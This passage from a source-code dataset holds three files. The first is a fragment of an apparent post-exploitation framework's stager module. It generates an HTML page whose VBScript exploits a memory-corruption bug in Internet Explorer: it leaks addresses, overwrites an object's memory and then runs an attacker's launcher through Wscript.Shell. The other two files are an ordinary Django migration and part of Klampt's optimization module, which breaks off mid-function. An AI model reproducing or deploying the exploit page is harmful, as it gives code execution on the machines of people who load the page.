}
# save off a copy of the mainMenu object to access external functionality
# like listeners/agent handlers/etc.
self.mainMenu = mainMenu
for param in params:
# parameter format is [Name, Value]
option, value = param
if option in self.options:
self.options[option]['Value'] = value
def generate(self):
# extract all of our options
language = self.options['Language']['Value']
listener_name = self.options['Listener']['Value']
base64 = self.options['Base64']['Value']
obfuscate = self.options['Obfuscate']['Value']
obfuscate_command = self.options['ObfuscateCommand']['Value']
user_agent = self.options['UserAgent']['Value']
proxy = self.options['Proxy']['Value']
proxy_creds = self.options['ProxyCreds']['Value']
stager_retries = self.options['StagerRetries']['Value']
encode = False
if base64.lower() == "true":
encode = True
obfuscate_script = False
if obfuscate.lower() == "true":
obfuscate_script = True
# generate the launcher code
launcher = self.mainMenu.stagers.generate_launcher(
listener_name, language=language, encode=encode, obfuscate=obfuscate_script,
obfuscationCommand=obfuscate_command, userAgent=user_agent, proxy=proxy, proxyCreds=proxy_creds,
stagerRetries=stager_retries)
if launcher == "":
print(helpers.color("[!] Error in launcher command generation."))
return ""
else:
code = f"""
<html>
<head>
<meta http-equiv="x-ua-compatible" content="IE=10">
</head>
<body>
<script type="text/vbscript">
Dim aw
Dim plunge(32)
Dim y(32)
prefix = "%u4141%u4141"
d = prefix & "%u0016%u4141%u4141%u4141%u4242%u4242"
b = String(64000, "D")
c = d & b
x = UnEscape(c)
Class ArrayWrapper
Dim A()
Private Sub Class_Initialize
ReDim Preserve A(1, 2000)
End Sub
Public Sub Resize()
ReDim Preserve A(1, 1)
End Sub
End Class
Class Dummy
End Class
Function getAddr (arg1, s)
aw = Null
Set aw = New ArrayWrapper
For i = 0 To 32
Set plunge(i) = s
Next
Set aw.A(arg1, 2) = s
Dim addr
Dim i
For i = 0 To 31
If Asc(Mid(y(i), 3, 1)) = VarType(s) Then
addr = strToInt(Mid(y(i), 3 + 4, 2))
End If
y(i) = Null
Next
If addr = Null Then
document.location.href = document.location.href
Return
End If
getAddr = addr
End Function
Function leakMem (arg1, addr)
d = prefix & "%u0008%u4141%u4141%u4141"
c = d & intToStr(addr) & b
x = UnEscape(c)
aw = Null
Set aw = New ArrayWrapper
Dim o
o = aw.A(arg1, 2)
leakMem = o
End Function
Sub overwrite (arg1, addr)
d = prefix & "%u400C%u0000%u0000%u0000"
c = d & intToStr(addr) & b
x = UnEscape(c)
aw = Null
Set aw = New ArrayWrapper
aw.A(arg1, 2) = CSng(0)
End Sub
Function exploit (arg1)
Dim addr
Dim csession
Dim olescript
Dim mem
Set dm = New Dummy
addr = getAddr(arg1, dm)
mem = leakMem(arg1, addr + 8)
csession = strToInt(Mid(mem, 3, 2))
mem = leakMem(arg1, csession + 4)
olescript = strToInt(Mid(mem, 1, 2))
overwrite arg1, olescript + &H174
Set Object = CreateObject("Wscript.Shell")
Object.run("{launcher}")
End Function
Function triggerBug
aw.Resize()
Dim i
For i = 0 To 32
' 24000x2 + 6 = 48006 bytes
y(i) = Mid(x, 1, 24000)
Next
End Function
</script>
<script type="text/javascript">
function strToInt(s)
{{
return s.charCodeAt(0) | (s.charCodeAt(1) << 16);
}}
function intToStr(x)
{{
return String.fromCharCode(x & 0xffff) + String.fromCharCode(x >> 16);
}}
var o;
o = {{"valueOf": function () {{
triggerBug();
return 1;
}}}};
setTimeout(function() {{exploit(o);}}, 50);
</script>
</body>
</html>
"""
return code
| 31.40613
| 120
| 0.47615
|
435ac90c41870b7b9d343a0932ff263e82df77bc
| 466
|
py
|
Python
|
openprescribing/frontend/migrations/0028_prescription_net_cost.py
|
rebkwok/openprescribing
|
28c7500a7e4cb725fc6cda0f8c58b07ac7e916a4
|
[
"MIT"
] | null | null | null |
openprescribing/frontend/migrations/0028_prescription_net_cost.py
|
rebkwok/openprescribing
|
28c7500a7e4cb725fc6cda0f8c58b07ac7e916a4
|
[
"MIT"
] | null | null | null |
openprescribing/frontend/migrations/0028_prescription_net_cost.py
|
rebkwok/openprescribing
|
28c7500a7e4cb725fc6cda0f8c58b07ac7e916a4
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
# Generated by Django 1.9.1 on 2017-06-19 11:51
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('frontend', '0027_auto_20170616_0925'),
]
operations = [
migrations.AddField(
model_name='prescription',
name='net_cost',
field=models.FloatField(blank=True, null=True),
),
]
| 22.190476
| 59
| 0.622318
|
f864d0a0feb9ecfef773f6a0e9803c7a1232b104
| 68,226
|
py
|
Python
|
Python/python3_version/klampt/math/optimize.py
|
ipa-rmb-mr/Klampt
|
71793b54eead788811b4e62bcf8dadb49b68ff17
|
[
"BSD-3-Clause"
] | 1
|
2020-07-03T20:38:20.000Z
|
2020-07-03T20:38:20.000Z
|
Python/python3_version/klampt/math/optimize.py
|
tcrapse/Klampt
|
d5a334e73f1f24ba4c606e03f49915b353799a57
|
[
"BSD-3-Clause"
] | null | null | null |
Python/python3_version/klampt/math/optimize.py
|
tcrapse/Klampt
|
d5a334e73f1f24ba4c606e03f49915b353799a57
|
[
"BSD-3-Clause"
] | null | null | null |
"""Classes to help set up and solve nonlinear, constrained optimization
problems.
Supports local and global optimization. Wraps around scipy, pyOpt, or
DIRECT (for now).
Works well with the klampt.math.symbolic module.
"""
import numpy as np
import math,random
from . import symbolic,symbolic_io,symbolic_linalg
from ..io import loader
class OptimizationProblem:
"""A holder for optimization problem data. All attributes are optional,
and some solvers can't handle certain types of constraints and costs.
The objective function must return a float. All equality and inequality
functions are required to return a list of floats.
Attributes:
objective (function): an objective function f(x)
objectiveGrad (function): a function df/dx(x) giving the gradient of f.
bounds (tuple): a pair (l,u) giving lower and upper bounds on the search space.
equalities (list of functions): functions :math:`g(x)=0` required of a
feasible solution. In practice, :math:`|g(x)| \leq tol` is required,
where tol is a tolerance parameter for the solver.
equalityGrads (list of functions): gradient/Jacobian functions
:math:`\\frac{\partial g}{\partial x}(x)` of the
equality functions.
        inequalities (list of functions): inequality functions requiring :math:`h(x) \leq 0`
for a feasible solution.
inequalityGrads (list of functions): a list of gradient/Jacobian functions
            :math:`\\frac{\partial h}{\partial x}(x)` of each inequality function.
feasibilityTests (list of functions): boolean black-box predicates that must
be true of the solution
Suitable for use with the symbolic module. Once a Context is created, and
appropriate Variables, Functions, Expressions are declared, the
setSymbolicObjective and addSymbolicConstraint methods automatically determine
the standard Python function forms. I.e., context.makeFlatFunction(f,varorder)
where varorder = None for the default variable ordering.
The OptimizationProblemBuilder class is more closely tied with the symbolic
module and is more convenient to use. It performs automatic simplification
and differentiation, and can be saved / loaded to disk.
"""
def __init__(self):
self.objective = None
self.objectiveGrad = None
self.bounds = None
self.equalities = []
self.inequalities = []
self.equalityGrads = []
self.inequalityGrads = []
self.feasibilityTests = []
def setObjective(self,func,funcGrad=None):
self.objective = func
self.objectiveGrad = funcGrad
def addEquality(self,func,funcGrad=None):
self.equalities.append(func)
self.equalityGrads.append(funcGrad)
def addInequality(self,func,funcGrad=None):
self.inequalities.append(func)
self.inequalityGrads.append(funcGrad)
def setBounds(self,xmin,xmax):
self.bounds = (xmin,xmax)
def setFeasibilityTest(self,test):
self.feasibilityTests = [test]
def addFeasibilityTest(self,test):
self.feasibilityTests.append(test)
def setSymbolicObjective(self,func,context,varorder=None):
"""Sets an objective function from a symbolic Function or Expression
(see symbolic module)."""
if varorder is None: varorder = context.variables
fpy,varorder = context.makeFlatFunction(func,varorder)
dfpy,varorder = context.makeFlatFunctionDeriv(func,varorder)
self.setObjective(fpy,dfpy)
def addSymbolicConstraint(self,func,context,varorder=None,blackbox=False):
"""adds a constraint from a symbolic Function or Expression
(see symbolic module). This will be "smart" in that AND Expressions will be
converted to multiple constraints, inequalities will be converted to inequality
constraints, and bounds will be converted to bound constraints. All other
constraints will be treated as feasibility constraints"""
if varorder is None: varorder = context.variables
if symbolic.is_op(func,"and"):
for a in func.args:
                self.addSymbolicConstraint(a,context,varorder)
elif symbolic.is_op(func,"le"):
if symbolic.is_var(func.args[0]) and symbolic.is_const(func.args[1]):
#x <= c
x = symbolic.to_var(func.args[0])
xmax = symbolic.to_const(func.args[1])
indices = context.getFlatVarRanges(varorder)
xindex = [i for i,v in enumerate(varorder) if v.name == x.name][0]
ai,bi = indices[xindex],indices[xindex+1]
n = indices[-1]
if self.bounds is None:
self.bounds = (np.array([-float('inf')]*n),np.array([float('inf')]*n))
self.bounds[1][ai:bi] = np.minimum(self.bounds[1][ai:bi],xmax)
elif symbolic.is_var(func.args[1]) and symbolic.is_const(func.args[0]):
#c <= x
xmin = symbolic.to_const(func.args[0])
x = symbolic.to_var(func.args[1])
indices = context.getFlatVarRanges(varorder)
xindex = [i for i,v in enumerate(varorder) if v.name == x.name][0]
ai,bi = indices[xindex],indices[xindex+1]
n = indices[-1]
if self.bounds is None:
self.bounds = (np.array([-float('inf')]*n),np.array([float('inf')]*n))
                self.bounds[0][ai:bi] = np.maximum(self.bounds[0][ai:bi],xmin)
else:
h = symbolic.simplify(func.args[0]-func.args[1])
if func.args[0].returnType().is_scalar() and func.args[1].returnType().is_scalar():
#need to convert to a vector
h = symbolic.flatten(h)
hpy,varorder = context.makeFlatFunction(h,varorder)
dhpy,varorder = context.makeFlatFunctionDeriv(h,varorder)
self.addInequality(hpy,dhpy)
elif symbolic.is_op(func,"ge"):
c = (func.args[1] <= func.args[0])
self.addSymbolicConstraint(c,context,varorder)
elif symbolic.is_op(func,"eq"):
g = symbolic.simplify(func.args[0]-func.args[1])
if func.args[0].returnType().is_scalar() and func.args[1].returnType().is_scalar():
#need to convert to a vector
g = symbolic.flatten(g)
gpy,varorder = context.makeFlatFunction(g,varorder)
dgpy,varorder = context.makeFlatFunctionDeriv(g,varorder)
self.addEquality(gpy,dgpy)
elif symbolic.is_op(func):
if func.functionInfo is symbolic_linalg.bound_contains and symbolic.is_const(func.args[0]) and symbolic.is_const(func.args[1]) and symbolic.is_var(func.args[2]):
#bound constraint
xmin = symbolic.to_const(func.args[0])
xmax = symbolic.to_const(func.args[1])
x = symbolic.to_var(func.args[2])
indices = context.getFlatVarRanges(varorder)
xindex = [i for i,v in enumerate(varorder) if v.name == x.name][0]
ai,bi = indices[xindex],indices[xindex+1]
n = indices[-1]
if self.bounds is None:
self.bounds = ([-float('inf')]*n,[float('inf')]*n)
for i,a,b in zip(list(range(ai,bi)),xmin,xmax):
self.bounds[0][i] = max(self.bounds[0][i],a)
self.bounds[1][i] = min(self.bounds[1][i],b)
else:
#it's a generic boolean
if not blackbox:
print("OptimizationProblem.addSymbolicConstraint(): Warning, turning function",func,"into black box function")
fpy,varorder = context.makeFlatFunction(func,varorder)
self.addFeasibilityTest(fpy)
else:
#it's a generic boolean
if not blackbox:
print("OptimizationProblem.addSymbolicConstraint(): Warning, turning function",func,"into black box function")
fpy,varorder = context.makeFlatFunction(func,varorder)
self.addFeasibilityTest(fpy)
def objectiveValue(self,x):
"""Returns the objective function value f(x)."""
return self.objective(x)
def feasible(self,x,equalityTol=1e-6):
"""Returns true if x is a feasible point."""
for g in self.equalities:
gx = g(x)
if any(abs(v) > equalityTol for v in gx): return False
for h in self.inequalities:
hx = h(x)
if any(v > 0 for v in hx): return False
for f in self.feasibilityTests:
if not f(x): return False
return True
def equalityResidual(self,x):
"""Returns the stacked vector g(x) where g(x)=0 is the equality constraint."""
if len(self.equalities) == 0: return []
return np.hstack([g(x) for g in self.equalities])
def inequalityResidual(self,x):
"""Returns the stacked vector h(x) where h(x)<=0 is the inequality constraint."""
if len(self.inequalities) == 0: return []
return np.hstack([h(x) for h in self.inequalities])
def makeUnconstrained(self,objective_scale,keep_bounds=True):
"""If this problem is constrained, returns a new problem in which
the objective function is a scoring function that sums all of
the equality / inequality errors at x plus
objective_scale*objective function(x). If objective_scale is small,
then the scoring function is approximately minimized at a feasible
minimum.
If the problem is unconstrained, this just returns self.
If keep_bounds = true, this does not add the bounds to the
inequality errors.
"""
#create a scoring function that is approximately minimized at
#a feasible minimum
if keep_bounds == False:
raise NotImplementedError("getting rid of bounds is not implemented yet")
if len(self.feasibilityTests) == 0 and len(self.inequalities) == 0 and len(self.equalities) == 0:
#already unconstrained
return self
if len(self.inequalities) == 0 and len(self.equalities) == 0:
#just have a feasibility test
def flatObjective(x):
if any(not f(x) for f in self.feasibilityTests):
return float('inf')
return self.objective(x)
            res = OptimizationProblem()
res.setObjective(flatObjective,self.objectiveGrad)
res.bounds = self.bounds
return res
def flatObjective(x):
if any(not f(x) for f in self.feasibilityTests):
return float('inf')
f = 0
            #penalize equality violations (max absolute residual) and inequality violations (sum of positive parts)
for g in self.equalities:
gx = g(x)
f += max(abs(v) for v in gx)
for h in self.inequalities:
hx = h(x)
f += sum(max(v,0) for v in hx)
if self.objective is not None:
f += objective_scale*self.objective(x)
return f
        res = OptimizationProblem()
res.setObjective(flatObjective,None)
res.bounds = self.bounds
return res
class LocalOptimizer:
"""A wrapper around different local optimization libraries. Only
minimization is supported, and only scipy and pyOpt are supported.
The method is specified using the method string, which can be:
- auto: picks between scipy and pyOpt, whatever is available.
- scipy: uses scipy.optimize.minimize with default settings.
- scipy.[METHOD]: uses scipy.optimize.minimize with the argument
method=[METHOD].
- pyOpt: uses pyOpt with SLSQP.
- pyOpt.[METHOD]: uses pyOpt with the given method.
"""
def __init__(self,method='auto'):
if method == 'auto':
try:
                import pyOpt
method = 'pyOpt'
except ImportError:
method = 'scipy'
self.method = method
self.seed = None
@staticmethod
def methodsAvailable():
"""Returns a list of methods that are available on this system"""
methods = []
try:
import pyOpt
methods.append('pyOpt')
pyoptmethods = ['SLSQP','PSQP','SNOPT','COBYLA','NLPQL','NLPQLP','MMA','GCMMA','KSOPT']
for m in pyoptmethods:
try:
x = getattr(pyOpt,m)
methods.append('pyOpt.'+m)
except AttributeError:
pass
except ImportError:
pass
try:
import scipy
methods.append('scipy')
methods.append('scipy.Nelder-Mead')
methods.append('scipy.Powell')
methods.append('scipy.CG')
methods.append('scipy.BFGS')
methods.append('scipy.TNC')
methods.append('scipy.COBYLA')
methods.append('scipy.L-BFGS-B')
methods.append('scipy.SLSQP')
except ImportError:
pass
return methods
@staticmethod
def methodsAppropriate(problem):
"""Returns a list of available methods that are appropriate to use for the given problem"""
allmethods = LocalOptimizer.methodsAvailable()
if len(problem.inequalities) > 0 or len(problem.equalities) > 0:
#can only do SLSQP, PSQP, and SNOPT
methods = []
for m in allmethods:
if m=='scipy' or m=='pyOpt' or m.endswith('SQP') or m.endswith('SNOPT'):
methods.append(m)
return methods
elif problem.bounds is not None:
#only can do bounded problems
            methods = []
            for m in allmethods:
if m=='scipy' or m=='pyOpt':
methods.append(m)
else:
if not any(m.endswith(x) for x in ['Nelder-Mead','Powell','CG','BFGS']):
methods.append(m)
return methods
else:
return allmethods
def setSeed(self,x):
self.seed = x
def solve(self,problem,numIters=100,tol=1e-6):
"""Returns a tuple (success,result)"""
if self.seed is None:
raise RuntimeError("Need to provide a seed state")
if problem.objective is None:
raise RuntimeError("Need to provide an objective function")
if self.method.startswith('scipy'):
from scipy import optimize
items = self.method.split('.')
scipyMethod = 'SLSQP'
if len(items)>1:
scipyMethod = items[1]
jac = False
if problem.objectiveGrad:
jac = problem.objectiveGrad
bounds = None
if problem.bounds:
bmin = [v if not math.isinf(v) else None for v in problem.bounds[0]]
bmax = [v if not math.isinf(v) else None for v in problem.bounds[1]]
bounds = list(zip(bmin,bmax))
constraintDicts = []
for i in range(len(problem.equalities)):
constraintDicts.append({'type':'eq','fun':problem.equalities[i]})
if problem.equalityGrads[i] is not None:
constraintDicts[-1]['jac'] = problem.equalityGrads[i]
for i in range(len(problem.inequalities)):
#scipy asks for inequalities to be positive g(x) >= 0, which requires a flip of sign
                constraintDicts.append({'type':'ineq','fun':lambda x,i=i:-np.array(problem.inequalities[i](x))})
                if problem.inequalityGrads[i] is not None:
                    constraintDicts[-1]['jac'] = lambda x,i=i:-np.array(problem.inequalityGrads[i](x))
if len(constraintDicts) > 0 and scipyMethod not in ['SLSQP','COBYLA']:
print("LocalOptimizer.solve(): warning, can't use method",scipyMethod,"with constraints")
input("Press enter to continue > ")
#print "Scipy constraints",constraintDicts
#print "Scipy bounds",bounds
#print "Objective jacobian",jac
res = optimize.minimize(problem.objective,x0=self.seed,method=scipyMethod,
jac=jac,bounds=bounds,
constraints=constraintDicts,tol=tol,options={'maxiter':numIters,'disp':True})
if res.success:
print("***********************************************************")
print("LocalOptimizer.solve(): Scipy solver result",res.message)
print(res)
x = res.x
print("My objective value:",problem.objective(x))
if len(problem.equalities) > 0:
h = np.hstack([f(x) for f in problem.equalities])
else:
h = [0]
if len(problem.inequalities) > 0:
g = np.hstack([f(x) for f in problem.inequalities])
else:
g = [0]
boundfeasible = all(a<=v and v<=b for v,a,b in zip(x,problem.bounds[0],problem.bounds[1])) if problem.bounds is not None else True
eqfeasible = all(abs(v)<tol for v in h)
ineqfeasible = all(v<=0 for v in g)
feasible = eqfeasible and ineqfeasible and boundfeasible
if not feasible:
if not boundfeasible:
#try clamping
for i in range(len(x)):
x[i] = min(max(x[i],problem.bounds[0][i]),problem.bounds[1][i])
boundfeasible = True
if len(problem.equalities) > 0:
h = np.hstack([f(x) for f in problem.equalities])
else:
h = [0]
if len(problem.inequalities) > 0:
g = np.hstack([f(x) for f in problem.inequalities])
else:
g = [0]
eqfeasible = all(abs(v)<tol for v in h)
ineqfeasible = all(v<=0 for v in g)
feasible = eqfeasible and ineqfeasible and boundfeasible
print("LocalOptimizer: solution not in bounds, clamped.")
print(" Bound-corrected equality residual",h)
print(" Bound-corrected inequality residual",g)
print(" Feasible?",eqfeasible,ineqfeasible)
if not feasible:
print("LocalOptimizer: Strange, Scipy optimizer says successful and came up with an infeasible solution")
if not eqfeasible:
print(" Equality has max residual",max(abs(v) for v in h),"> tolerance",tol)
print(" Residual vector",h)
if not ineqfeasible:
                            print("    Inequality has residual",max(v for v in g),"> 0")
print(" Residual vector",g)
if not boundfeasible:
for i,(v,a,b) in enumerate(zip(x,problem.bounds[0],problem.bounds[1])):
if v < a or v > b:
print(" Bound %d: %f <= %f <= %f violated"%(i,a,v,b))
input("Press enter to continue >")
print("***********************************************************")
return res.success,res.x.tolist()
elif self.method.startswith('pyOpt'):
import pyOpt
import warnings
warnings.filterwarnings("ignore", category=DeprecationWarning)
items = self.method.split('.')
pyOptMethod = 'SLSQP'
if len(items)>1:
pyOptMethod = items[1]
if problem.bounds is not None:
bmin = np.array(problem.bounds[0][:])
bmax = np.array(problem.bounds[1][:])
#for some reason PyOpt doesn't do well with infinite bounds
for i,v in enumerate(problem.bounds[0]):
if math.isinf(v): bmin[i] = -1e20
for i,v in enumerate(problem.bounds[1]):
if math.isinf(v): bmax[i] = 1e20
ubIndices = [i for i,v in enumerate(bmax) if not math.isinf(v)]
lbIndices = [i for i,v in enumerate(bmin) if not math.isinf(v)]
else:
ubIndices = []
lbIndices = []
def objfunc(x):
#print "EVALUATING OBJECTIVE AT",x
fx = problem.objective(x)
eqs = [f(x) for f in problem.equalities]+[f(x) for f in problem.inequalities]
if len(eqs) == 0:
gx = []
else:
gx = np.hstack(eqs)
assert len(gx.shape)==1
gx = gx.tolist()
if problem.bounds is not None:
ub = (x-bmax)[ubIndices]
lb = (bmin-x)[lbIndices]
if len(gx) == 0:
gx = ub.tolist() + lb.tolist()
else:
gx = gx + ub.tolist() + lb.tolist()
#for f in problem.equalities:
# print "EQUALITY VALUE",f(x)
#for f in problem.inequalities:
# print "INEQUALITY VALUE",f(x)
flag = not any(not f(x) for f in problem.feasibilityTests)
#print "CONSTRAINTS",gx
#print "FUNCTION VALUE IS",fx
assert len(gx) == hlen+glen+len(ubIndices)+len(lbIndices)
flag = True
if any(math.isnan(v) for v in x):
return 0,[0]*len(gx),flag
return fx,gx,flag
opt_prob = pyOpt.Optimization('',objfunc)
opt_prob.addObj('f')
for i in range(len(self.seed)):
if problem.bounds is not None:
opt_prob.addVar('x'+str(i),'c',lower=bmin[i],upper=bmax[i],value=self.seed[i])
else:
opt_prob.addVar('x'+str(i),'c',value=self.seed[i])
hlen = sum(len(f(self.seed)) for f in problem.equalities)
glen = sum(len(f(self.seed)) for f in problem.inequalities)
opt_prob.addConGroup('eq',hlen,'e')
opt_prob.addConGroup('ineq',glen,'i')
#expressing bounds as inequalities
opt_prob.addConGroup('bnd',len(ubIndices)+len(lbIndices),'i')
opt = getattr(pyOpt,pyOptMethod)()
#opt.setOption('IPRINT', -1)
opt.setOption('IPRINT', -2)
opt.setOption('MAXIT',numIters)
opt.setOption('ACC',tol)
sens_type = 'FD'
if problem.objectiveGrad is not None:
#user provided gradients
if all(f is not None for f in problem.equalityGrads) and all(f is not None for f in problem.inequalityGrads):
#print "RETURNING GRADIENTS"
def objfuncgrad(x):
fx = problem.objectiveGrad(x)
gx = sum([f(x) for f in problem.equalityGrads]+[f(x) for f in problem.inequalityGrads],[])
for i in ubIndices:
zero = [0]*len(x)
zero[i] = 1
gx.append(zero)
for i in lbIndices:
zero = [0]*len(x)
zero[i] = -1
gx.append(zero)
flag = True
return fx,gx,flag
sens_type = objfuncgrad
else:
print("LocalOptimizer.solve(): Warning, currently need all or no gradients provided. Assuming no gradients.")
[fstr, xstr, inform] = opt(opt_prob,sens_type=sens_type)
if inform['value'] != 0:
return False,xstr.tolist()
f,g,flag = objfunc(xstr)
#flag doesn't check?
eqfeasible = all(abs(v)<tol for v in g[:hlen])
ineqfeasible = all(v <= 0 for v in g[hlen:hlen+glen])
boundfeasible = all(a<=x and x<=b for x,a,b in zip(xstr,problem.bounds[0],problem.bounds[1])) if problem.bounds is not None else True
feasible = eqfeasible and ineqfeasible and boundfeasible
if not feasible:
if not boundfeasible:
#try clamping
for i in range(len(xstr)):
xstr[i] = min(max(xstr[i],bmin[i]),bmax[i])
f,g,flag = objfunc(xstr)
boundfeasible = True
eqfeasible = all(abs(v)<tol for v in g[:hlen])
ineqfeasible = all(v <= 0 for v in g[hlen:hlen+glen])
feasible = eqfeasible and ineqfeasible and boundfeasible
if not feasible:
print("LocalOptimizer: Strange, pyOpt optimizer says successful and came up with an infeasible solution")
h = g[:hlen]
g = g[hlen:hlen+glen]
if not eqfeasible:
print(" Equality has max residual",max(abs(v) for v in h),"> tolerance",tol)
print(" Residual vector",h)
if not ineqfeasible:
                        print("    Inequality has residual",max(v for v in g),"> 0")
print(" Residual vector",g)
if not boundfeasible:
                        for i,(v,a,b) in enumerate(zip(xstr,bmin,bmax)):
if v < a or v > b:
print(" Bound %d: %f <= %f <= %f violated"%(i,a,v,b))
input("Press enter to continue >")
return feasible,xstr.tolist()
else:
raise RuntimeError('Invalid method specified: '+self.method)
def sample_range(a,b):
"""Samples x in the range [a,b].
* If the range is bounded, the uniform distribution x~U(a,b) is used.
* If the range is unbounded, then this uses the log transform to sample a distribution.
Specifically, if a=-inf and b is finite, then :math:`x \sim b + \log(y)` where
:math:`y \sim U(0,1)`. A similar formula holds for a finite and b=inf.
If a=-inf and b=inf, then :math:`x \sim s*\log(y)`, where `y \sim U(0,1)` and the sign
s takes on either of {-1,1} each with probability 0.5.
"""
x = random.uniform(a,b)
if math.isinf(x) or math.isnan(x):
try:
if math.isinf(a):
if math.isinf(b):
                    s = random.randint(0,1)*2-1
y = math.log(random.random())
return s*y
else:
y = math.log(random.random())
return b + y
elif math.isinf(b):
y = math.log(random.random())
return a - y
except ValueError:
#very, very small chance of this happening (2^-48)
return sample_range(a,b)
return x
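# A tiny sketch of sample_range (illustrative; results are random draws). On a
# bounded interval it is uniform; with one infinite endpoint it uses the
# log-transform described in the docstring above.
def _example_sample_range():
    bounded = sample_range(0.0, 1.0)                   # uniform in [0, 1]
    half_unbounded = sample_range(2.0, float('inf'))   # 2 - log(U), always >= 2.0
    return bounded, half_unbounded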
class GlobalOptimizer:
"""A wrapper around different global optimization libraries. Only
minimization is supported, and only DIRECT, scipy, and pyOpt are supported.
The optimization technique is specified using the method string, which can be:
- 'auto': picks between DIRECT and random-restart
- 'random-restart.METHOD': random restarts using the local optimizer METHOD.
- 'DIRECT': the DIRECT global optimizer
- 'scipy': uses scipy.optimize.minimize with default settings.
- 'scipy.METHOD': uses scipy.optimize.minimize with the argument
method=METHOD.
- 'pyOpt': uses pyOpt with SLSQP.
- 'pyOpt.METHOD': uses pyOpt with the given method.
The method attribute can also be a list, which does a cascading solver
in which the previous solution point is used as a seed for the next
solver.
Examples:
- 'DIRECT': Run the DIRECT method
- 'scipy.differential_evolution': Runs the scipy differential evolution technique
- 'random-restart.scipy': Runs random restarts using scipy's default local optimizer
- 'random-restart.pyOpt.SLSQP': Runs random restarts using pyOpt as a local optimizer
- ['DIRECT','auto']: Run the DIRECT method then clean it up with the default local optimizer
Random restarts picks each component x of the seed state randomly using sample_range(a,b)
where [a,b] is the range of x given by problem.bounds.
DIRECT and scipy.differential_evolution require a bounded state space.
"""
def __init__(self,method='auto'):
if method == 'auto':
method = 'random-restart.scipy'
self.method = method
self.seed = None
def setSeed(self,x):
self.seed = x
def solve(self,problem,numIters=100,tol=1e-6):
"""Returns a pair (solved,x) where solved is True if the solver
found a valid solution, and x is the solution vector."""
if isinstance(self.method,(list,tuple)):
#sequential solve
seed = self.seed
for i,m in enumerate(self.method):
if hasattr(numIters,'__iter__'):
itersi = numIters[i]
else:
itersi = numIters
if hasattr(tol,'__iter__'):
toli = tol[i]
else:
toli = tol
print("GlobalOptimizer.solve(): Step",i,"method",m,'iters',itersi,'tol',toli)
if m == 'auto':
opt = LocalOptimizer(m)
else:
opt = GlobalOptimizer(m)
#seed with previous seed, if necessary
opt.setSeed(seed)
(succ,xsol)=opt.solve(problem,itersi,toli)
if not succ: return (False,xsol)
seed = xsol[:]
return ((seed is not None),seed)
elif self.method == 'scipy.differential_evolution':
from scipy import optimize
if problem.bounds == None:
raise RuntimeError("Cannot use scipy differential_evolution method without a bounded search space")
flattenedProblem = problem.makeUnconstrained(objective_scale = 1e-5)
res = optimize.differential_evolution(flattenedProblem.objective,list(zip(*flattenedProblem.bounds)))
print("GlobalOptimizer.solve(): scipy.differential_evolution solution:",res.x)
print(" Objective value",res.fun)
print(" Equality error:",[gx(res.x) for gx in problem.equalities])
return (True,res.x)
elif self.method == 'DIRECT':
import DIRECT
if problem.bounds == None:
raise RuntimeError("Cannot use DIRECT method without a bounded search space")
flattenedProblem = problem.makeUnconstrained(objective_scale = 1e-5)
minval = [float('inf'),None]
def objfunc(x,userdata):
v = flattenedProblem.objective(x)
if v < userdata[0]:
userdata[0] = v
userdata[1] = [float(xi) for xi in x]
return v
(x,fmin,ierror)=DIRECT.solve(objfunc,problem.bounds[0],problem.bounds[1],eps=tol,maxT=numIters,maxf=40000,algmethod=1,user_data=minval)
print("GlobalOptimizer.solve(): DIRECT solution:",x)
print(" Objective value",fmin)
print(" Minimum value",minval[0],minval[1])
print(" Error:",ierror)
print(" Equality error:",[gx(x) for gx in problem.equalities])
return (True,minval[1])
elif self.method.startswith('random-restart'):
import random
if problem.bounds == None:
raise RuntimeError("Cannot use method %s without a bounded search space"%(self.method,))
localmethod = self.method[15:]
lopt = LocalOptimizer(localmethod)
seed = self.seed
best = self.seed
print("GlobalOptimizer.solve(): Random restart seed is:",best)
fbest = (problem.objective(best) if (best is not None and problem.feasible(best)) else float('inf'))
for it in range(numIters[0]):
if seed is not None:
x = seed
seed = None
else:
x = [sample_range(a,b) for a,b in zip(*problem.bounds)]
print(" Solving from",x)
lopt.setSeed(x)
succ,x = lopt.solve(problem,numIters[1],tol)
print(" Result is",succ,x)
print(" Equality:",problem.equalityResidual(x))
if succ:
fx = problem.objective(x)
if fx < fbest:
fbest = fx
best = x
return (best is not None, best)
else:
assert self.seed is not None,"Pure local optimization requires a seed to be set"
opt = LocalOptimizer(self.method)
opt.setSeed(self.seed)
return opt.solve(problem,numIters,tol)
class OptimizerParams:
def __init__(self,numIters=50,tol=1e-3,
startRandom=False,numRestarts=1,
timeout=10,globalMethod=None,localMethod=None):
self.numIters=numIters
self.tol=tol
self.startRandom=startRandom
self.numRestarts=numRestarts
self.timeout = timeout
self.globalMethod = globalMethod
self.localMethod = localMethod
def toJson(self):
obj = dict()
for attr in ['numIters','tol','startRandom','numRestarts','timeout','globalMethod','localMethod']:
obj[attr] = getattr(self,attr)
return obj
def fromJson(self,obj):
for attr in ['numIters','tol','startRandom','numRestarts','timeout','globalMethod','localMethod']:
if attr in obj:
setattr(self,attr,obj[attr])
def solve(self,optProblem,seed=None):
"""Globally or locally solves an OptimizationProblem instance with the given parameters.
Optionally takes a seed as well. Basically, this is a thin wrapper around GlobalOptimizer
that converts the OptimizerParams to the appropriate format.
Returns (success,x) where success is True or False and x is the solution.
"""
method = self.globalMethod
numIters = self.numIters
if self.globalMethod == 'random-restart' or (self.globalMethod is None and (self.numRestarts > 1 or self.startRandom == False)):
#use the GlobalOptimize version of random restarts
assert self.localMethod is not None,"Need a localMethod for random-restart to work ('auto' is OK)"
if self.globalMethod is None:
method = 'random-restart' + '.' + self.localMethod
else:
method = self.globalMethod + '.' + self.localMethod
numIters = [self.numRestarts,self.numIters]
elif self.localMethod is not None:
if self.globalMethod is None:
method = self.localMethod
else:
#do a sequential optimization
method = [self.globalMethod,self.localMethod]
#co-opt self.numRestarts for the number of outer iterations?
numIters = [self.numRestarts,self.numIters]
optSolver = GlobalOptimizer(method=method)
if seed is not None:
optSolver.setSeed(seed)
(succ,res) = optSolver.solve(optProblem,numIters=numIters,tol=self.tol)
return (succ,res)
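# A hedged sketch of driving a solve through OptimizerParams (illustrative only).
# It assumes `problem` is a bounded OptimizationProblem, e.g. one built as in the
# _example_optimization_problem sketch above, and a seed inside the bounds.
def _example_optimizer_params(problem, seed):
    params = OptimizerParams(numIters=50, tol=1e-4, numRestarts=5,
                             localMethod='scipy')
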